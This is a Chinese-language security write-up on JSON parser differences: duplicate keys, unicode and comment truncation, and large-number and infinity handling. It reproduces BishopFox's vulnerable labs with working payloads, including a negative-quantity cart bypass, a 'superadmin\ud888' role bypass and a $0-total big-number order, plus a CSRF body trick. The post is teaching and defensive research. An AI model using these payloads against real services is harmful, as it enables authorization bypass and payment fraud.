JSON解析差异-风险研究

简介

这篇文章中，分享一个技巧。通过json解析差异可能存在的安全风险

需要的前提：多组件JSON解析存在差异

从json开始

JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，易于人类阅读和编写，同时也易于机器解析和生成。它广泛用于数据传输，尤其是在客户端与服务器之间的数据交换。

源自JavaScript语言，但随着时间的推移，已发展成为众多编程语言支持的通用数据格式标准。

一个示例

{
  "name": "John Doe",
  "age": 30,
  "isEmployee": true,
  "address": {
    "street": "123 Main St",
    "city": "New York",
    "zipcode": "10001"
  },
  "phoneNumbers": ["123-456-7890", "987-654-3210"]
}

JSON解析安全问题

在正式开始之前，先说两个结论

相同的 JSON 文档可以跨微服务解析为不同的值，从而导致各种潜在的安全风险
正是因为第一点，JSON解释器越多，那么潜在得安全问题越多

问题来源

想必任何问题都是这样，无规矩不成方圆，正是因为没有对JSON格式化进行强定义的规范导致JSON解析差异引发安全问题

官方 JSON RFC 中，也对一些细节提供了宽泛的规则，例如如何处理重复键和表示数字。尽管本指南后面有关于解析差异的免责声明，但大多数 JSON 解析器的用户并未关注这些注意事项

并且除了官方的RFC规范，还有很多不同解析器的不同规范，列举如下

IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
HJSON: HJSON is similar to JSON5 in spirit with different design choices.
等等...

重复键的处理(优先级问题)

obj = {"a": 1, "a": 2}

如上：a的值到底是1还是2？

来看下IETF JSON RFC (8259)的解释https://datatracker.ietf.org/doc/html/rfc8259

官方解释了这块：简单理解意思就是并无明确规定

问题复现：https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1

这里我们采用这个实验进行问题分析

启动容器

docker-compose up -d

python flask jsonschema 处理

import jsonschema
import requests
import json



test_json = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}


test_json2 = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": -10,
            "qty": 1
        }
    ]
}

schema = {
    "type": "object",
    "properties": {
        "orderId": {
            "type": "number",
            "maximum": 10,
        },
        "cart": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": "number",
                        "minimum": 0,
                        "exclusiveMaximum": 9 #len(productDB)-1
                    },
                    "qty": {
                        "type": "integer",
                        "minimum": 1
                    },
                },
                "required": ["id", "qty"],
            }
        }
    },
    "required": ["orderId", "cart"],
}


res = jsonschema.validate(instance=test_json, schema=schema)
print(res)
print(test_json)

res2 = jsonschema.validate(instance=test_json2, schema=schema)
print(res2)
print(test_json2)

可见python处理的方式为，已重复的第二个键为主

golang的处理

package main

import (
    "fmt"
    "github.com/buger/jsonparser"
)

func main() {
    jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": -1,
                "qty": 1
            }
        ]
    }`)

    // fmt.Println("data:", jsonData)

    jsonparser.ArrayEach(
        jsonData,
        func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
            id, _ := jsonparser.GetInt(value, "id")
            qty, _ := jsonparser.GetInt(value, "qty")
            fmt.Println("id:", id)
            fmt.Println("qty:", qty)
        },
    "cart")

}

可见go jsonparser处理的方式为，已重复的第一个键为主
lab1的wp也就是利用的这一点，python的flask服务作为代理校验层，而真正的计算逻辑在go

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json

# lab1_req.json
{
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}

100*5-200 = 300

字符截断&注释(优先级问题)

可以通过字符截断和注释引发解析冲突问题，从而增加受重复键优先级影响的解析器数量。

字符截断

当特定字符出现在字符串中时，某些json解析lib会截断，而一些解析器则不会。可能会导致不同的键被解释为重复项

比如如下payload

{"test": 1, "test\[raw \x0d byte]": 2} 
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}

python2.X 对unicode编码解码行为

import json
import ujson
# Serialization into illegal unicode.
u"asdf\ud800".encode("utf-8")

# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})

# 三方工具 ujson处理 重复key
ujson.loads('{"test": 1, "test\\ud800": 2}')

python3.X 对unicode编码解码行为

总结可见，python2 对此类情况存在绕过的可能

lab2 复现

https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2

创建admin用户/user/create，正常业务逻辑

{
    "user": "adminUser",
    "roles": ["superadmin"]
}

创建普通角色成功

{"name": "simple"}

superadmin\ud888 unicode解析绕过

[root@localhost lab2]# cat role2.json 
{"name": "superadmin\ud888"}

创建exampleuser 权限为 superadmin\ud888

[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}

[root@localhost lab2]# cat user2.json 
{
    "user": "exampleUser",
    "roles": ["superadmin\ud888"]
}

验证

注释截断

这块引用整理如下：

obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}

不同json sdk解析结果如下

GoLang's GoJay library

description = "Duplicate with comments"
test = 2
extra = ""

Java's JSON-iterator library

description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1

obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}

不同json sdk解析结果如下

Java’s GSON library

{"description":"Comment support","test":1,"extra":"a"}

Ruby’s simdjson library

{"description":"Comment support","test":2,"extra":"a","extra2":"b"}

JSON序列化风险

json序列化过程同样需要注重重复键的问题，举例如下

# Java's JSON-iterator

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 1
obj.toString() // {"test": 2}

# C++’s rapidjson

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}

int float类型 json解析

首先看下官方的解释，RFC中明确提出这块解析会有潜在的不一致问题

大数问题

# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

# 可能的output
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807

eg：

python3 demo

[root@localhost json-interop-vuln-labs_test]# python3 python_json.py 
/usr/local/lib/python3.8/site-packages/urllib3/__init__.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 3.9.0'. See: https://github.com/urllib3/urllib3/issues/3020
  warnings.warn(
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}

python3对大数处理正常

go demo

jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
            }
        ]
    }`)

GO 处理大数字解析后为 0

lab1的第二种解法

[root@localhost lab1]# cat lab1_alt_req.json 
{
        "orderId": 10,
        "cart": [
        {
            "id": 8,
            "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
        }
    ]
}

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json

>>>
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit

Total Charged: $0

最后一种特殊case，大数到无穷大

RFC定义：Positive and negative infinity along with NaN (not a number) are not supported by the official RFC

同样RFC并没有进行强制规定，那么可能的case如下

{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}

# php demo
<b><?php</b>
echo 0 == 1.0e4096 ? "True": "False" . "\n"; # False
echo 0 == "Infinity" ? "True": "False" . "\n"; # True
<b>?></b>

宽松的JSON序列化

总结来说，一些json解析器会严格执行RFC语法。同样其他的解析器允许出现一些"奇怪"字符

CSRF攻击中

POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded

{"testlaitie233": 1}=

一些payload之所以能够执行也是因为这个原因

这部分可以进行fuzz测试

防御

这部分要分为json sdk开发普通使用开发者两个维度

json sdk开发：严格按照RFC定义规范，并处理本文介绍的异常case
普通开发者(使用方)：盘点整个架构中现有的解析器，对异常情况进行jsonscheme强校验

写在最后

本文介绍了一种json解析导致的潜在安全问题，在真实的环境，需要多多分析各json解释器的差异和相同点

历史上也有很多CVE的原理如此

参考

https://bishopfox.com/blog/json-interoperability-vulnerabilities

https://portswigger.net/daily-swig/research-how-json-parsers-can-create-security-risks-when-it-comes-to-interoperability

https://github.com/BishopFox/json-interop-vuln-labs/